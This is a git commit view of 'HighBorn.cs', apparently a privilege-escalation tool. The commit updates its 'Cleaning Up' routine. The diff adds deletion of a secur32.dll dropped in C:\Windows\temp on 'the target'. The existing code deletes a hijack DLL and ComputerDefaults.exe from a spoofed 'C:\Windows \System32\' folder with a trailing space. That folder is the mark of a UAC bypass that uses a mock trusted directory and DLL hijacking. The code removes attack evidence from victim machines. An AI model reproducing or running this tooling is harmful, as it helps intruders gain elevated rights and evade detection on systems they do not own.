Browse Source

Update HighBorn.cs

Updated to delete the dll from the temp folder on the target.
assume-breach 3 years ago
parent
commit
79a850e843
1 changed files with 2 additions and 1 deletions
  1. 2 1
      HighBorn/HighBorn.cs

+ 2 - 1
HighBorn/HighBorn.cs

@@ -87,7 +87,8 @@ namespace HighBorn
             }
 
             Console.WriteLine("[^] Cleaning Up");
-            
+		
+            	DeleteFileW(@"C:\Windows\temp\secur32.dll");
         	DeleteFileW(@"C:\Windows \System32\ComputerDefaults.exe");
 		DeleteFileW(@"C:\Windows \System32\secur32.dll");
 		RemoveDirectory(@"C:\Windows \System32\");